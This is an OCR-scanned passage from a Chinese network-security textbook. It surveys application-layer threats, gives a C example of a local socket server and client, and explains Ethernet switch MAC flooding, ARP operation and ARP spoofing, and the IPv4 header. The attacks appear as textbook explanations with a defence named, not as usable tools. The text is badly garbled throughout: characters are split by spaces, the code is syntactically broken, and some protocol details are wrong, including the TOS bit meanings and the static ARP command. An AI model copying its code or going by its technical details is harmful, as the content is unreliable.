1. 病毒 /蠕虫 /木马 

应 用 层 最 常见 的 威胁 便 是 恶意 代码 一 一 病毒 .蠕虫 木马。 病毒 是 以 文件 形式 寄存 在 其 
他 文件 当中 ,而 且 能 够 自我 复制 并 具有 一 定 的 破坏 能 力 的 代码 。 蠕 虫 和 病毒 类 似 , 也 具有 自 
我 复制 和 传播 能 力 ,但 是 它 可 以 不 以 文件 的 形式 存在 ,而 驻 留 在 内 存 中 ,传播 速度 也 比 病毒 
快 。 木 马 是 伪装 在 系统 中 ,以 窃取 用 户 信 息 为 主要 目的 的 恶意 代码 。 

2. 间谍 软件 

间谍 软件 是 一 种 有 网 络 后 门 ,能 够 满足 受害 用 户 一 定 功能 需求 ,并 且 可 以 在 用 户 不 知情 
的 情况 下 将 用 户 信息 发 送 到 指定 位 置 的 软件 。 间 谍 软 件 的 危害 和 木马 类 似 , 但 间谍 软件 比 
木马 体积 更 大 且 更 具有 欺骗 性 ,间谍 软件 也 是 流 谍 软 件 的 一 种 。 

3. 应 用 层 DDOS 

最 常见 的 应 用 层 DDOS 攻击 是 HTTP Flooding 攻击 , 它 包括 两 种 , 即 HTTP Get 泛 洪 
攻击 和 高 消耗 请 求 攻击 。HTTP Get 泛 洪 攻 击 是 指 黑客 发 送 大 量 合法 的 HTTP Get 请 求 
占用 系统 资源 ,使 合法 用 户 无 法 访问 网 站 。 高 消耗 型 DDOS 攻击 是 指 黑客 大 量 请 求 或 访 
问 , 需 要 消耗 大 量 服务 器 CPU 和 内 存 的 网 页 ,导致 服务 器 CPU 和 内 存 资 源 被 占用 ,从 而 拒 
绝 合法 用 户 请 求 。 

4. 网 络 钓鱼 

网 络 钓鱼 是 指 黑客 通过 伪造 电子 邮件 和 Web 网 站 来 欺骗 受害 者 ,例如 黑客 通过 电子 邮 
件 伪 装 成 受害 者 的 客户 或 者 通过 伪造 Web 网 站 仿冒 电子 银行 网 站 获取 受害 者 账户 资料 。 

5. 漏洞 利用 

漏洞 利用 是 指 利用 操作 系统 、 应 用 软件 或 Web 网 站 的 漏洞 发 起 攻击 ,此 类 型 的 攻击 网 
上 很 常见 ,如 果 用 户 不 及 时 更 新 系统 补丁 和 软件 ,系统 上 就 会 存在 非常 多 的 可 以 被 利用 的 
漏洞 。 





j 题 1 


1-1 信息 保障 的 目的 是 什么 ? 
1-2 什么 是 网 络 安 全 ? 
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1-3 安全 服务 有 哪 几 种 ? 
1-4 安全 机 制 有 哪 几 类 ? 


1-5 案例 一 ,126 邮箱 登录 界面 (图 1-10) 中 右 下 角 SSL 的 作用 是 什么 ? 
1-6 案例 二 ,中 国 建设 银行 登录 界面 (图 1-11) 中 左上 角 的 “小 锁 ” 作 用 是 什么 ? 
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图 1-11 中 国 建设 银行 登录 界面 


423€ TCP/IP 协议 族 及 其 
安全 性 分 析 


以 TCP/IP 协议 为 核心 的 计算 机 网 络 是 重要 的 基础 设施 之 一 , 且 已 成 为 信息 交流 与 共 
享 的 基础 。 但 是 ,TCP/ 了 协议 在 设计 之 初 未 考虑 安全 问题 ,自然 存在 漏洞 和 脆弱 性 。 掌 握 
TCP/IP 网 络 的 安全 风险 ,有 利于 防范 恶意 网 络 攻 击 、 排 除 系统 与 网 络 漏洞 ,为 网 民 提 供 一 
个 安全 可 靠 的 网 络 环境 。 


2.1 TCP/IP 协议 概述 


TCP/IP 是 一 套用 于 计算 机 通信 的 协议 , 它 规范 了 网 络 上 的 所 有 通信 设备 ,尤其 是 一 个 
主机 与 男 一 个 主机 之 间 的 数据 往来 格式 以 及 传送 方式 。TCP/IP 是 一 个 4 层 协议 栈 ,包括 
网 络 接口 层 、 网 络 层 ,运输 层 和 应 用 层 , 如 图 2-1 所 示 。 
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c 物理 网 络 1 SR c 物理 网 络 2 和 
2-1 TCP/IP 协议 通信 模型 


应 用 层 直 接 为 网 络 提供 服务 ,使 得 应 用 程序 能 通过 网 络 收发 数据 ; 应 用 层 定义 了 到 运 
输 层 的 套 接 字 接口 (Socket) ,并 且 与 操作 系统 无 关 。 运 输 层 负 责 向 应 用 层 提 供 两 种 服务 , 即 
面向 连接 的 服务 和 无 连接 的 服务 。 网 络 层 负责 对 数据 包 提供 路 由 选择 ,所 谓 路 由 选择 是 指 
决定 一 个 数据 包 的 具体 传输 路 径 , 并 以 最 高 的 效率 抵达 目的 地 。 

图 2-1 中 的 主机 A( 信 源 ) 和 主机 B( 信 宿 ) 之 间 的 TCP/IP 通信 ,逻辑 传输 线路 表明 了 数 
据 传输 的 方向 ,实际 传输 线路 表明 了 数据 的 真实 传输 链 路 。 

1. TCP/IP 协议 工作 原理 

TCP/IP 协议 族 中 ,IP 和 TCP 功能 不 相同 ,它们 是 在 同一 时 期 作为 一 个 协议 来 设计 的 ,并 
且 在 功能 上 也 是 互补 的 。 虽 然 它 们 可 以 分 开 单独 使 用 ,但 是 只 有 两 者 结合 才能 保证 Internet 
在 复杂 的 环境 下 正常 运行 。 连 接 到 Internet 的 计算 机 ,必须 同时 安装 和 使 用 这 两 个 协议 ,因此 
在 实际 中 常 把 这 两 个 协议 统称 为 TCP/IP 协议 。TCP/IP 协议 族 各 层 关系 如 图 2-2 所 示 。 
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1 
媒体 
2-2 TCP/IP 各 层 关 系 


ICMP 是 IP 的 附属 协议 ,IP 用 它 来 与 其 他 主机 或 路 由 器 交换 错误 报 文 或 其 他 摘要 信 
息 。IGMP 是 Internet 组 管理 协议 , 它 用 来 把 一 个 UDP 数据 包 多 播 到 多 个 主机 。ARP 和 
RARP 是 以 太 网 网 络 接口 使 用 的 特殊 协议 ,它们 用 来 转换 网 络 接口 的 MAC 地 址 和 对 应 的 
IP 地 址 。 

当 目 的 主机 收 到 一 个 以 太 网 数据 帧 时 ,数据 就 开始 从 协议 栈 的 底部 向 上 升 , 同 时 去 掉 各 
层 协议 封装 的 报 文 首 部 。 每 层 协议 盒 都 要 去 检查 报 文 首 部 中 的 标识 协议 ,以 确定 接收 数据 
的 上 层 协议 。 这 个 过 程 称 为 分 用 (Demultiplexing) ,如 图 2-3 所 示 。 








应 用 程序 | --- | 应 用 程序 应 用 程序 | … | 应 用 程序 
根据 TCP 或 UDP 
号 
进行 分 用 
D ewm 
协议 值 进行 分 用 



















































































ARP RARP 
EIC [er erbe 
的 帧 类 型 进行 分 用 
以 太 网 
驱动 程序 
i 
进入 的 帧 


图 2-3 TCP/IP 分 用 
2. TCP/IP 协议 套 接 字 通信 
应 用 层 通过 运输 层 进行 数据 通信 时 ,TCP 和 UDP 会 遇 到 同时 为 多 个 进程 提供 并 发 服 
务 的 问题 。 多 个 TCP 进程 或 连接 需要 通过 同一 个 TCP 协议 端口 传输 数据 ,为 了 区 别 不 同 
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的 进程 或 连接 ,操作 系统 为 进程 与 TCP/IP 交互 提供 称 为 套 接 字 (Socket) 的 接口 ,如 图 2-4 
所 示 。 套 接 字 分 为 流 式 套 接 字 (SOCK_STREAM) 和 数据 报 套 接 字 (SOCK_DGRAM) 两 
类 。 流 式 套 接 字 用 于 TCP 协议 ,为 需要 可 靠 连接 的 应 用 程序 设计 ,这 些 程序 通常 使 用 连续 
的 数据 流 ,一 些 应 用 层 协 议 如 HTTP、FTP 、SMTP、POP3 使 用 它 。 数 据 报 套 接 字 用 于 UDP 
协议 ,是 无 连接 的 ,为 对 可 靠 性 要 求 不 高 的 应 用 程序 而 设计 ,不 保证 数据 会 到 达 终 端 ,也 不 保 
证 以 正确 的 顺序 到 达 ; 数据 报 套 接 字 传输 效率 相当 高 ,用 于 音频 或 视频 应 用 程序 ,这 些 程序 
要 求 速度 比 可 靠 性 更 加 重要 。 






















































































媒体 
2-4 Socket 通信 


区 分 不 同 应 用 程序 进程 间 的 网 络 通信 ,主要 有 3 个 参数 , 即 目的 IP 地 址 、 传 输 层 协议 
(CTCP 或 UDP) 和 端口 号 。 将 这 3 个 参数 与 Socket 绑 定 ,应 用 层 和 传输 层 通过 套 接 字 接 口 ， 
可 以 区 分 来 自 不 同 应 用 程序 进程 或 网 络 连接 的 通信 ,从 而 实现 数据 传输 的 并 发 服务 。 

与 Socket 套 接 字 相关 的 系统 调用 有 socket (创建 一 个 套 接 字 )、close OE B] — + f E 
F) .connect( 在 两 个 套 接 字 之 间 创 建 连接 ) bind( 将 一 个 服务 器 套 接 字 绑 定 一 个 地 址 )、 
listen( 设 置 一 个 套 接 字 为 接受 连接 状态 ) ,accept( 接 受 一 个 连接 请 求 ,并 为 新 建立 的 连接 创 
建 一 个 新 的 套 接 字 ) 。 

用 socket-server( 服 务 器 程序 ) 和 socket-client( 客 户 端 程序 ) 两 个 程序 展示 socket 套 接 
字 的 通信 实例 ,socket-server 建立 一 个 本 地 命名 空间 ,并 通过 它 监听 连接 ; 当 它 连接 之 后 ， 
socket-client 连接 到 一 个 本 地 套 接 字 并 发 送 一 条 文本 消息 ,socket-server 不 断 从 中 读 取 文 
本 信息 并 输出 这 些 信息 。 

socket-server. c 本 地 命名 空间 套 接 字 服 务 器 程序 如 下 : 

# include < stdio.h> 

# include < stdlib.h> 


# include < string. h> 
# include < sys/ socket. h > 
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# include < sys/un.h> 
# include <unistd.h> 
int server (int client socket) 
{ 
while (1) 
{ 
int length; 
char * text; 
if (read (client_socket, &length, sizeof (length)) == 0) return 0; 
text = (char * ) malloc (length); 
read (client socket, text, length); 
printf (" % s\n", text); 
if (!strcmp (text, "quit")) 


free (text); 
return 1; 
) 

free (text); 
return 0; 

J 
y 
int main (int argc,char * const argv[ ]) 
{ 

const char * const socket name = argv[1]; 

int socket fd; 
struct sockaddr un name; 

int client sent quit message; 
socket fd = socket(PF LOCAL, SOCK STREAM, 0); 

name.sun family - AF LOCAL; 
strcpy(name.sun path, socket name); 
bind(socket fd, &name, SUN LEN(&name)) ; 
listen(socket fd,5); 
do( 

struct sockaddr un client name; 

socklen t client name len; 
int client socket fd; 
client socket fd = accept (socket fd,&client name,&client name len); 
client sent quit message = server(client socket fd); 
close(client socket fd); 
while (!client sent quit message); 
close(socket fd); 
unlink(socket name); 
return 0; 


socket-client. c 本 地 命名 空间 套 接 字 客 户 端 程序 如 下 : 


include < stdio.h> 
include < string. h> 
include < sys/socket.h> 
include < sys/un.h> 
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# include < unistd.h> 
void write text (int socket fd, const char * text) 
{ 
int length = strlen (text) + 1; 
write (socket fd,&length, sizeof (length)); 
write (socket fd,text, length); 
) 
int main (int argc,char * const argv[]) 
{ 
const char * const socket name = argv[1]; 
const char * const message - argv[2]; 
int socket fd; 


struct sockaddr un name; 
Socket fd = socket (PF LOCAL, SOCK STREAM, 0); 
name.sun family - AF LOCAL; 
strcpy (name. sun path, socket name); 
connect (socket fd,&name, SUN LEN (&name) ) ; 
write text (socket fd, message); 
close (socket fd); 
return 0; 
) 
虽然 基于 TCP/IP 协议 的 Internet 获得 了 巨大 成 功 , 但 是 它 也 可 以 被 有 经 验 的 黑客 人 
侵 ,以 达到 窃取 和 泄露 敏感 信息 的 目的 。TCPVIP 协议 的 安全 缺陷 体现 在 每 一 层次 。 


2.2 网 络 接口 层面 临 的 安全 威胁 


2.2.1 以 太 网 面临 的 安全 威胁 


TCP/IP 分 层 体系 中 ,数据 链 路 层 和 物理 层 合 称 为 网 络 接口 层 (Network Interface 
Layer)。 网 络 接 口 层 将 上 层 协议 数据 发 送 到 网 络 媒介 上 ,并 从 网 络 媒 介 接 收 数据 。 

最 常见 的 网 络 接口 技术 是 以 太 网 。 以 太 网 采用 星 状 拓扑 结构 ,使 用 交换 机 (Switch) 连 接 
网 络 节点 。 交 换 机 以 帧 的 概念 进行 工作 ,根据 交换 机 表 (Table ) 来 决定 把 到 达 的 帧 发 送 到 哪个 
端口 ,而 不 是 广播 接收 到 的 帧 。 正 是 由 于 这 个 原理 ,不 同 的 端口 对 之 间 可 以 同时 进行 数据 交 
换 , 提 高 了 网 络 的 性 能 。 交 换 机 表 的 每 个 表 项 包括 3 个 字段 , 即 节点 的 MAC 地 址 .该 MAC 地 
址 对 应 的 端口 ,该 表 项 在 表 中 的 时 间 。 交 换 机 通过 自学 习 功 能 建立 交换 机 表 , 即 通过 观察 帧 的 
ili MAC 地 址 和 达到 端口 来 建立 MAC 地 址 和 端口 的 映射 关系 。 由 于 交换 机 不 采用 广播 方式 
进行 数据 传输 ,因此 能 在 一 定 程度 上 降低 被 窃听 的 风险 。 但 是 ,对 于 以 下 两 种 情况 ,交换 机 会 
采用 广播 方式 发 送 数据 : 第 一 ,如 果 帧 的 目的 MAC 地 址 为 广播 地 址 , 即 FF-FF-FF-FF-FF-FF; 
第 二 ,如 果 帧 的 目的 MAC 地 址 在 交换 机 表 中 查 不 到 对 应 的 表 项 , 则 广播 该 帧 。 

由 此 可 见 , 在 交换 式 以 太 网 中 仍然 可 以 嗅 探 到 一 些 其 他 节点 之 间 交 换 的 数据 帧 。 同 时 ， 
交换 机 表 的 空间 是 有 限 的 ,新 的 "MAC 地 址 -端口 ?映射 对 的 到 达 会 替换 旧 的 表 项 。 如 果 攻 
击 者 发 送 了 大 量 不 同 伪造 源 MAC 地 址 的 帧 ,由 于 交换 机 的 自学 习 功 能 ,这 些 新 的 "MAC 地 
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址 -端口 ”映射 对 会 填充 整个 交换 机 表 , 而 这 些 表 项 都 是 无 效 的 ,结果 交换 机 完全 退化 为 广播 
模式 ,使 攻击 者 达到 窃听 数据 的 目的 ,该 攻击 称 为 交换 机 毒化 (Switch Poisoning)。 

以 太 网 以 帧 作为 协议 数据 单元 ,最 常用 的 帧 格式 是 类 型 [以太 网 帧 格式 ,如 图 2-5 所 
示 。 其 中 前 同步 码 (Preamble) 和 CRC 校 验 由 硬件 进行 处 理 , 因 此 通过 抓 包 工具 Wireshark 
得 不 到 这 两 个 字段 的 信息 。 目 的 MAC 用 于 指明 这 个 数据 帧 的 目的 节点 ,而 源 MAC 用 于 
指明 这 个 帧 的 发 送 者 ,这 两 个 字段 分 别 占 用 48 位 。 源 MAC 字段 之 后 是 以 太 类 型 (Ether 
Type) ,该 字段 说 明 帧 的 有 效 载 荷 类 型 ,例如 0x0800 表示 有 效 载 荷 为 IPv4 协议 包 , 常 见 的 
以 太 类 型 的 含义 如 表 2-1 所 示 。 在 图 2-5 中 ,该 帧 的 目的 MAC 地 址 为 FF-FF-FF-FF-FF- 
FF ,表示 这 个 帧 是 广播 帧 ; 而 源 MAC 地 址 为 00-1F-CA-5D-E3-55; 类 型 字段 为 0x0806 , 表 
明 这 个 帧 承载 的 是 ARP 数据 。 





48 位 48 位 48 位 | 16 位 46 一 1500 字 节 32 位 
前 同步 码 | 目的 MAC | 源 MAC | 类 型 |1IPv4,IPv6,ARP,RARP,…| CRC 校 验 


























ff ff ff ff ff ff ca 5d e3 55 00 01 
08 00 06 04 00 01 00 If ca 5d e3 55 3c ff c8 01 
00 00 00 00 00 00 3c ff c9 73 0000 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 


图 2-5 类 型 工 以 太 网 帧 格式 
表 2-1 常见 以 太 类 型 含义 





以 太 类 型 有 效 载 荷 的 类 型 以 太 类 型 有 效 载荷 的 类 型 
0x0800 IPv4 协议 包 0x86DD IPv6 协议 包 
0x0806 ARP 协议 包 0x8035 RARP 协议 包 





综 上 所 述 ,以 太 网 所 面临 的 安全 威胁 主要 是 窃听 , 即 可 能 对 数据 通信 的 机 密 性 造成 威 
胁 。 对 于 采用 集线器 连接 的 以 太 网 ,这 种 威胁 是 难以 避免 的 ; 对 于 通过 交换 机 连接 的 以 太 
网 ,可 以 在 一 定 程度 上 降低 这 种 风险 。 


2.2.2 ARP 面临 的 安全 威胁 


1. ARP 工作 原理 

在 TCP/IP 协议 栈 中 ,网 络 层 数据 需要 通过 下 层 的 物理 网 络 传输 到 下 一 节点 :因此 需要 
将 IP 地 址 映射 到 物理 地 址 , 即 地 址 解析 。 对 于 以 太 网 来 说 .ARP 实现 IP 地 址 映射 到 MAC 
地 址 ,RARP 实现 MAC 地 址 映射 到 IP 地 址 。ARP 协议 包括 两 种 类 型 的 包 , 即 ARP 请 求 
和 ARP 应 答 。ARP 请 求 报 文 包括 IP 地 址 , ARP 应 答 报 文 提供 MAC 地 址 。ARP 消息 的 
格式 如 图 2-6 所 示 。 

(1) 硬件 类 型 : 表示 硬件 地 址 的 类 型 , 它 的 值 为 1 表示 以 太 网 地 址 。 

(2) 协议 类 型 : 表示 要 映射 的 协议 地 址 类 型 , 它 的 值 为 0x0800 即 表示 IPv4 地 址 。 

(3) 硬件 地 址 长 度 和 协议 地 址 长 度 : 分 别 指出 硬件 地 址 和 协议 地 址 的 长 度 ,以 字 节 为 
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0 78 15 
硬件 类 型 (Hw Type) 
协议 类 型 (Proto Type) 
硬件 地 址 长 度 (Hw Size) 协议 地 址 长 度 (Proto Size) 
操作 (OP) 

















发 送 方 硬件 地 址 SHA) 





发 送 方 协议 地 址 (SPA) 





接收 方 硬件 地 址 (THA) 





接收 方 协 议 地 址 (SPA) 








2-6 ARP 消息 的 格式 


单位 ; 对 于 以 太 网 上 IP 地 址 的 ARP 请 求 或 应 答 来 说 ,它们 的 值 分 别 为 6 和 4。 
(4) 操作 类 型 (OP): 1 表示 ARP 请 求 ,2 表示 ARP 应 答 。 
(5) 发 送 方 硬件 地 址 : 发 送 方 设备 的 MAC 地 址 。 
(6) 发 送 方 协议 地 址 : 发 送 方 设备 的 TP 地 址 。 
(7) 接收 方 硬件 地 址 : 接收 方 设备 的 MAC 地 址 。 
(8) 接收 方 协议 地 址 : 接收 方 设备 的 IP 地 址 。 
ARP 消息 的 一 种 更 简洁 的 表示 方式 如 图 2-7 所 示 。 





Hw Type | Proto Type Hw Size Proto Size | OP | SHA| SPA | THA| SPA 



































2-7 ARP 消息 格式 的 简洁 表示 方式 


例如 ,对 应 字段 为 二 0x0001,0x0800,6,4,… 二 的 ARP 消息 可 以 解读 为 : 物理 网 络 为 以 
太 网 ,上 层 协 议 为 IP 协议 ,物理 网 络 的 地 址 长 度 为 6 个 8 位 组 ,上 层 协议 的 地 址 长 度 为 4 个 
8 位 组 等 。 

ARP 协议 的 工作 过 程 如 图 2-8 所 示 , 当 节点 192. 168. 1. 101 需要 向 节点 192. 168. 1. 103 
发 送 数据 时 ,如 节点 101 ping 节点 103。 如 果 节 点 101 无 法 通过 本 地 缓存 解析 节点 103 的 
MAC 地 址 , 则 节点 101 发 送 ARP 请 求 ,其 目的 地 址 为 广播 地 址 ,因此 当前 网 络 的 所 有 节点 
均 可 收 到 该 ARP 请 求 ; 节点 103 收 到 该 请 求 后 ,发 送 ARP 应 答 。 在 上 述 过 程 中 ,其 他 节点 
只 能 被 动 接收 。 

为 了 降低 地 址 解析 的 开销 ,网 络 节点 维持 一 个 ARP 缓存 (ARP R) ,用 于 保存 最 近 获 取 
的 IP-MAC 映射 。ARP 表 建 立 在 内 核 空 间 , 因 此 不 能 太 大 , 当 需 要 增加 新 的 表 项 而 ARP 表 
已 经 占 满 时 , 则 需要 删除 其 中 的 过 时 表 项 ,因此 需要 合适 的 更 新 算法 ,使 得 所 缓存 的 
IP-MAC 映射 最 有 效 。 同 时 ,ARP 缓存 中 的 表 项 具有 一 定 的 生命 周期 ,更 新 算法 淘汰 其 中 
停留 时 间 最 长 的 表 项 ,目的 是 为 了 保持 IP-MAC 映射 的 新 鲜 性 。 如 果 一 台 主 机 包括 多 个 网 
络 适配器 , 则 对 应 每 个 网 络 适配器 分 别 有 各 自 的 ARP 缓存 。 在 Windows 的 命令 提示 窗口 
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中 输入 “arp-a” 命 令 , 则 输出 ARP 缓存 中 的 内 容 。ARP 表 中 的 表 项 分 为 两 类 , 即 静态 和 动 
S. HA ARP 表 项 具有 永久 的 生命 期 ,在 Windows 下 可 以 通过 “arp-a ip mac ”命令 来 添 
加 ; 而 动态 表 项 是 通过 对 ARP 响应 获得 的 IP-MAC 映射 。 





& 


了 





192.168.1.101 @ ARP 应 答 
ŞI XV A 
192.168.1.102 192.168.1.103 192.168.1.104 
2-8 ARP 请 求 过 程 示例 
2. ARP 欺骗 


ARP 协议 用 于 IP 地 址 到 MAC 地 址 的 转换 ,该 地 址 的 映像 关系 存储 在 ARP 缓存 表 
中 。 如 果 黑 客 攻击 ARP 缓存 表 , 将 导致 应 该 发 送 给 正确 主机 的 数据 包 由 攻击 者 转发 给 其 
指定 的 另外 的 目标 主机 。 

一 般 情 况 下 ,对 于 使 用 集线器 的 局 域 网 环境 ,攻击 者 只 需 把 网 卡 设置 为 混杂 模式 即 可 。 
而 对 于 使 用 交换 机 的 局 域 网 ,攻击 者 会 试探 交换 机 是 否 存在 失败 保护 模式 (Fail-Safe 
Mode) 。 由 于 交换 机 维护 TP 地 址 和 MAC 地 址 的 映像 关系 需要 花费 一 定 的 处 理 时 间 , 当 网 
络 通信 出 现 大 量 虚假 MAC 地 址 时 , 某 些 类 型 的 交换 机 会 出 现 过 载 情 况 ,从 而 转换 到 失败 保 
护 模 式 ,其 工作 方式 和 集线器 相同 。 如 果 交 换 机 不 存在 失败 保护 模式 , 则 攻击 者 就 会 使 用 
ARP 欺骗 。 

ARP 欺骗 (ARP Spoofing) 需 要 攻击 者 主机 具有 IP 数据 包 的 转发 能 力 , 并 拥有 两 块 网 
卡 , 假 设 IP 地 址 分 别 是 192. 168. 0. 5 和 192. 168. 0. 6 ,分 别 插入 交换 机 的 两 个 端口 ,他 准备 
截获 目标 主机 192. 16.0. 3 和 网 关 192. 168. 0. 2 之 间 的 通信 ,如 图 2-9 所 示 。 





因特网 


路 由 器 192.168.0.1 
1 













192.168.0.5 








a 
r= 192.168.0.6 


[ Ex] 
192.168.0.4 192.168.0.3 
图 2-9 ARP 欺骗 攻击 
正常 情况 下 ,假定 主机 A(192. 168. 0. 4) 想 要 通过 网 关 (192. 168. 0. 2) 访 问 因特网 。 它 


以 广播 方式 发 送 ARP 请 求 , 要 求 获得 网 关 的 MAC 地 址 。 交 换 机 收 到 ARP 请 求 ,并 将 请 求 
包 转 发 给 各 个 主机 。 同 时 ,交换 机 将 更 新 MAC 地 址 和 端口 之 间 的 映射 表 , 主 机 A 将 绑 定 它 
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所 连接 的 端口 。 网 关 收 到 ARP 请 求 后 ,发 出 带 有 网 关 的 MAC 地 址 的 ARP 响应 。 网 关 更 
新 ARP 缓存 表 , 绑 定 主机 A 的 IP 地 址 和 MAC 地 址 。 交 换 机 收 到 网 关 对 主机 A 的 ARP 
响应 后 ,查找 它 的 MAC 地 址 和 端口 之 间 的 映射 表 , 转 发 ARP 数据 包 到 相应 端口 。 同 时 , 交 
换 机 更 新 它 的 MAC 地 址 和 端口 之 间 的 映射 表 , 即 将 192. 168. 0. 2 绑 定 到 它 所 连接 的 端口 。 
主机 A 收 到 ARP 响应 数据 包 后 ,更 新 ARP 缓存 表 ,继而 绑 定 网 关 的 IP 地 址 和 MAC 地 址 。 
主机 A 使 用 更 新 后 的 MAC 地 址 信息 把 数据 发 送 给 网 关 , 通 信 信 道 就 此 建立 。 

在 ARP 欺骗 的 情况 下 ,攻击 者 必须 诱 使 目标 主机 (192. 168. 0. 3) 和 网 关 (192. 168. 0. 2) 
与 他 通信 。 这 样 ,攻击 者 就 伪装 成 路 由 器 ,使 目标 主机 和 网 关 之 间 所 有 数据 通信 都 经 由 攻击 
者 的 主机 转发 ,攻击 者 就 能 对 数据 进行 随意 处 理 。 

如 果 攻 击 者 执行 两 次 ARP 欺骗 ,打开 两 个 命令 界面 ,就 能 同时 欺骗 目标 主机 和 网 关 。 

ARP 欺骗 的 防御 方法 是 静态 IP-MAC 绑 定 。 








2.3 ”网 络 层 面临 的 安全 威胁 


1. IP 协议 

IP 协议 是 Internet 上 一 个 关键 的 网 际 协议 ,通过 IP 协议 可 使 Internet 成 为 一 个 连接 异 
构 计 算 机 系统 (包括 不 同类 型 的 计算 机 和 不 同 的 操作 系统 ) 的 网 络 。IP 协议 负责 将 数据 从 
源 传送 到 目的 地 ,但 不 保证 传送 的 可 靠 性 ,也 不 提供 流量 控制 . 包 顺 序 和 其 他 对 于 主机 到 主 
机 协议 来 说 很 普通 的 服务 。 利 用 IP 协议 ,可 以 将 多 个 包 交 换 网 络 连接 起 来 ,在 源 地 址 和 目 
的 地 址 之 间 传 送 数据 报 , 并 提供 数据 包 的 重新 组 装 功能 ,以 适应 不 同 网 络 对 包 大 小 的 要 求 。 

IP 协议 由 主机 到 主机 协议 调用 ,而 此 协议 负责 调用 本 地 网 络 协议 将 数据 报 传送 至 下 一 
个 网 络 或 目的 主机 。 例 如 ,TCP 协议 可 以 调用 IP 协 议 ,在 调用 时 传送 目的 地 址 和 源 地 址 作 
为 参数 ,IP 协议 形成 数据 报 并 调用 本 地 网 络 ( 协 议 ) 接 口传 送 数 据 报 。 

IP 协议 能 够 实现 两 个 基本 功能 , 即 寻 址 和 分 段 。IP 协议 可 以 根据 数据 报 报 头 中 包括 的 
目的 地 址 将 数据 报 传送 到 目的 地 址 ,在 此 过 程 中 IP 协议 负责 选择 传送 的 路 径 , 这 种 选择 路 
径 的 功能 称 为 路 由 功能 。 如 果 在 有 些 网 络 内 只 能 传送 小 数据 报 ,IP 协议 支持 将 数据 报 重 新 
组 装 并 在 报头 域内 注 明 。 了 P 模块 中 包含 这 些 基 本 功能 ,这 些 模块 位 于 网 络 中 的 每 台 主 机 和 
网 关上 ,而 且 这 些 模 块 ( 特 别 是 在 网 关上 的 ) 有 路 由 选择 和 其 他 服务 功能 。 

IP 使 用 4 个 关键 技术 提供 服务 , 即 服务 类 型 .生存 时 间 、 选 项 和 报头 校 验 码 。 服 务 类 型 
指 希 望 得 到 的 服务 功能 , 它 是 一 个 参数 集 , 这 些 参数 是 Internet 能 够 提供 的 典型 功能 ,这 种 
服务 类 型 由 网 关 使 用 ,用 于 在 特定 的 网 络 ,或 是 用 于 在 下 一 个 要 经 过 的 网 络 ,或 是 下 一 个 要 
对 这 个 数据 报 进 行路 由 的 网 关上 选择 实际 的 传送 参数 。 生 存 时 间 是 数据 报 可 以 生存 的 最 长 
时 间 , 它 由 发 送 者 设置 ,由 路 由 经 过 的 地 方 处 理 。 如 果 未 到 达 时 生存 时 间 为 零 , 则 抛弃 此 数 
据 报 。 对 于 控制 函数 来 说 选项 是 重要 的 ,但 对 于 通常 的 通信 来 说 它 没有 存在 的 必要 ,选项 包 
括 时 间 戳 .安全 和 特殊 路 由 。 报 头 校 验 码 用 于 保证 数据 的 正确 传输 。 如 果 校 验 错误 , 则 抛弃 
整个 数据 报 。 

IP 不 能 保证 提供 的 传输 服务 可 靠 , 也 不 提供 端 到 端 或 点 到 点 的 确认 ,对 数据 未 进行 差 
错 控制 , 它 只 使 用 报头 的 校 验 码 ,不 提供 重 发 和 流量 控制 功能 。 如 果 出 错 可 以 通过 ICMP 报 
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告 ,ICMP 在 IP 模块 中 实现 。 

IP 协议 提供 了 能 适应 各 种 各 样 网 络 硬件 的 灵活 性 ,对 底层 网 络 硬件 几乎 没有 任何 要 
求 ,任何 一 个 网 络 只 要 可 以 从 一 个 地 点 向 另 一 个 地 点 传送 二 进 制 数据 ,就 可 以 使 用 IP 协议 
加 入 Internet, IP 协议 对 于 网 络 通信 有 着 重要 的 意义 ,网 络 中 的 计算 机 通过 安装 IP 软件 ， 
使 许多 局 域 网 共同 构成 一 个 并 不 存在 的 虚拟 网 络 ,利用 IP 协议 可 以 把 全 世界 所 有 愿意 接 人 
Internet 的 计算 机 局 域 网 连接 起 来 ,使 得 它们 彼此 之 间 都 能 够 互相 通信 。 

IP 协议 包头 格式 如 图 2-10 Bros. IP 数据 包 由 头 部 和 数据 构成 。 头 部 有 20B 的 固定 长 
度 和 一 个 可 选项 ,可 选项 长 度 不 定 ,最 长 为 60B。 






































版 本 号 | 包头 长 度 服务 类 型 总 长 度 
(4) (4) (8) (16) 
标识 (16) 0 | AREE 
生存 期 (8) 协议 标识 (8) 报头 校 验 和 (16) 
Wi IP 地址 (32) 
目的 IP 地 址 (32) 
选项 (如 果 有 ) 填充 位 
数据 











2-10 JIP 协 议 包 头 格式 


图 2-10 中 各 字段 含义 如 下 。 

CD 版 本 号 。4 位 ,该 字段 用 来 表明 包头 格式 所 遵循 的 版 本 信息 。 目 前 所 用 版 本 是 IP 
版 本 4( 即 IPv4) 因 此 其 值 为 0100。 

(2) 包头 长 度 (IHL)。4 位 ,Internet 包头 长 度 是 以 32 位 为 单位 的 IP 包 的 包头 长 度 ( 包 
括 选项 ) 。 包 头 长 度 的 实际 作用 在 于 指向 了 IP 数据 报 中 载荷 ( 即 数据 ) 的 开始 位 置 ,IHL 的 
最 小 值 为 5, 最 大 值 不 超过 15 ,一 般 情况 下 其 值 就 是 最 小 值 5 。 

(3) 服务 类 型 (TOS)。8 fi TOS 字段 用 于 设 定 服务 质量 (QoS) 的 参数 ,这 些 参 数 用 于 
在 特定 网 络 中 指明 数据 包 所 对 应 的 服务 质量 ,从 而 为 其 提供 优先 级 服务 。 选 择 的 基本 原则 
是 以 下 三 者 的 权衡 , 即 延迟 D(Delay) .吞吐 量 T(Throughput) 可靠 性 R (Reliability), Jf 
非 所 有 网 络 均 支持 TOS 字段 ,在 很 多 情况 下 该 字段 并 未 启用 。 

第 0—2 位 : 优先 级 (Precedence) ,该 3 位 现 已 被 忽略 而 未 使 用 。 

第 3 位 : 时 延 ,0 表示 通常 延 时 ; 1 表示 最 小 延 时 。 

第 4 位 : 吞吐 量 ,0 表示 通常 吞吐 量 ; 1 表示 最 大 吞吐 量 。 

第 5 位 : 可 靠 性 ,0 表示 通常 可 靠 性 ; 1 表示 最 高 吞吐 量 。 

第 6 位 : 代价 ,0 表示 通常 代价 ; 1 表示 最 小 吞吐 量 。 

第 7 位 : 保留 。 

(4) 总 长 度 。16 位 ,该 字段 指明 以 字 节 为 单位 的 IP 包 的 长 度 ( 包 括 IP 包头 和 数据 )， 
